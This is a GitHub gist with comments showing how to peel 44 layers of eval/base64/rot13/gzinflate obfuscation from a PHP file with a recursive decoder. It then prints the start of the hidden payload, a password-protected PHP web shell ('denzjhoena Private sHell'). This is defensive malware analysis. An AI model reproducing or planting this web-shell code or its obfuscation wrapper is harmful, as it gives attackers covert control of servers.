Skip to content

Instantly share code, notes, and snippets.

@koto

koto/1.php

Created Sep 19, 2011
Embed
What would you like to do?
Fighting inception obfuscation
<?php
// I got this file once
eval(gzinflate(str_rot13(base64_decode('HJ3FkqzYAlI/52gEA9yGuHjikw7cNfGvf0w...60KB.of.code...z///Oe/7/W/fwE=')))); ?>
<?php
// obviously I didn't want it to eval(), so to deobfuscate it i simply did:
print(gzinflate(str_rot13(base64_decode('HJ3FkqzYAlI/52gEA9yGuHjikw7cNfGvf0w...60KB.of.code...z///Oe/7/W/fwE=')))); ?>
and....
$ php 2.php
eval(gzinflate(str_rot13(base64_decode('HJ23juvIFlI/5w3AgN6F9N57JgPRey...59.5KB.of.code..=')
$ oh crap
-bash: oh: command not found
$ php 2.php > 3.php
$ joe 3.php
<editing...>
$ php 3.php
eval(gzinflate(str_rot13(base64_decode('HJ23juvIFlI/5w3AgN6F9N57JgPRey...59KB.of.code..=')
Friggin inceptions! there might be many of them...
<?php
// and this is how you handle this
function t($code) {
echo "."; // just to detect how many inceptions there were
$code = str_rot13(base64_decode($code));
$code = gzinflate($code);
$m = array();
if (preg_match('/str_rot13\(base64_decode\(\'(.+)\'\)/', $code, $m)) {
return t($m[1]);
}
return $code;
}
$code = 'HJ3FkqzYAlI/52gEA9yGuHjikw7cNfGvf0w...60KB.of.code...z///Oe/7/W/fwE=';
print(t($code));
$ php deception.php | head
............................................ // 44 inceptions!
@session_start();@set_time_limit(0);@$pass = $_POST['pass'];$chk_login = true;$password = "tampan";if($pass == $password){$_SESSION['nst'] = "$pass";}if($chk_login == true){if(!isset($_SESSION['nst']) or $_SESSION['nst'] != $password){die("<title>.::[ Yogyacarderlink Area ]::.</title><body style=margin:0px;><table border=0 cellpadding=0 cellspacing=0 width=100% height=100% bgcolor=black><tr><td valign=middle align=center><table cellpadding=2 cellspacing=2 width=100 bgcolor=black style='border:1px solid #FFFF00;'><tr><td><table width=100 bgcolor=black style='border:1px dashed #FFFF00;'><tr><td><form method=post><font size=1 face=verdana color=white><b><center>-:: Wellcome to Private sHell ::-</center></b><hr style='border:1px dashed #FFFF00;'><center><input type=password name=pass size=30><br><br><input type=submit value=GO style='background-color: #000000; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: #CCCCCC; border-right-color: #999999; border-bottom-color: #999999; border-left-color: #CCCCCC; color: #FFFFFF;'></center></form><b>Host :</b> ".$_SERVER["HTTP_HOST"]."<br><b>IP :</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br><b>Your IP :</b> ".$_SERVER["REMOTE_ADDR"]."</font></td></tr></table></tr></td></table></td></tr></table></body>");}}$language='eng';error_reporting(0);set_magic_quotes_runtime(0);@set_time_limit(0);@ini_set('max_execution_time',0);@ini_set('output_buffering',0);$safe_mode = @ini_get('safe_mode');$version = "denzjhoena Private sHell";if(version_compare(phpversion(), '4.1.0') == -1){$_POST = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS;$_SERVER = &$HTTP_SERVER_VARS;}if (@get_magic_quotes_gpc()){foreach ($_POST as $k=>$v){$_POST[$k] = stripslashes($v);}foreach ($_SERVER as $k=>$v){$_SERVER[$k] = stripslashes($v);}}
$head = '
<html>
<head>
<title>[ ? ] denzjhoena shell [ ? ]</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<STYLE>
tr {
@koto

This comment has been minimized.

Copy link
Owner Author

@koto koto commented Sep 19, 2011

Of course, under 44 layers of obfuscation there was a PHP shell script...

@damianb

This comment has been minimized.

Copy link

@damianb damianb commented Sep 19, 2011

so, that's 44 layers total, not including the two attempts at the beginning?

also, they didn't try to change the obfuscation methods throughout? that's surprising.

@koto

This comment has been minimized.

Copy link
Owner Author

@koto koto commented Sep 20, 2011

yeah, 44 in total, all steps were the same.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment